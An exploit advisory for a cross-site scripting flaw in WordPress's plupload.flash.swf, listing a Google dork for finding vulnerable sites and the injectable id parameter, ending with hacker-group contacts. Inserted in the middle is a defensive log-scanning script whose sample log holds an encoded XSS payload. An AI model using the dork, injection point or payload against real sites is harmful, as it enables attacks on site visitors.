[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+]
[+] Exploit Title: WordPress Js plupload Cross Site Scripting
[+]
[+] Exploit Author: Ashiyane Digital Security Team
[+]
[+] Date: 2014-08-09
[+]
[+] Google Dork : inurl:/wp-includes/js/plupload
[+]
[+] Vendor Homepage : http://www.Wordpress.org
[+]
[+] Tested on: Linux, Mozilla Firefox
[+]
[+] Discovered By : M???? ??????? , Spoofer
[+]
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] Location :
[localhost]/wp-includes/js/plupload/plupload.flash.swf?id=[XSS]
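
Added example (not part of the original advisory): a log check a site owner can run to find requests to plupload.flash.swf whose id parameter is not a plain token. The allow-list SAFE_ID, the combined access-log format, and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Assumption: a legitimate plupload instance id is a short alphanumeric token.
SAFE_ID = re.compile(r"^[A-Za-z0-9_-]{0,64}$")
SWF_PATH = re.compile(r"/wp-includes/js/plupload/plupload\.flash\.swf$", re.I)
# Request line inside a combined-format access log entry (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    r'192.0.2.10 - - [09/Aug/2014:10:00:01 +0000] "GET /wp-includes/js/plupload/plupload.flash.swf?id=p18f3k2a HTTP/1.1" 200 1234',
    r'203.0.113.7 - - [09/Aug/2014:10:00:05 +0000] "GET /wp-includes/js/plupload/plupload.flash.swf?id=\%22%29%29;}catch%28e%29{alert%281%29;}// HTTP/1.1" 200 1234',
    r'192.0.2.10 - - [09/Aug/2014:10:00:09 +0000] "GET /wp-includes/js/plupload/plupload.full.min.js?ver=1 HTTP/1.1" 200 999',
]

def fully_unquote(value, rounds=3):
    """Percent-decode repeatedly so nested encoding cannot hide characters."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_swf_requests(lines):
    """Return (line_number, decoded_id) for SWF requests with a non-token id."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST.search(line)
        if not match:
            continue  # not a parseable request line
        url = urlsplit(match.group(1))
        if not SWF_PATH.search(unquote(url.path)):
            continue  # some other resource
        # parse_qs already decodes once; fully_unquote handles extra layers.
        for raw in parse_qs(url.query, keep_blank_values=True).get("id", []):
            decoded = fully_unquote(raw)
            if not SAFE_ID.match(decoded):
                hits.append((number, decoded))
    return hits

if __name__ == "__main__":
    for number, value in suspicious_swf_requests(SAMPLE_LOG):
        print(f"line {number}: suspicious id={value!r}")
```

Any hit is a reason to check whether the SWF file is still present on the server and whether the installed WordPress version still ships it.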
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] Demo :
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
We Love Mohammad , Spoofer ( Love )
Mail : milad.hacking.blackhat@gmail.com
Home Page : https://www.facebook.com/milad.hacking.5
WwW.Masaldownload.ir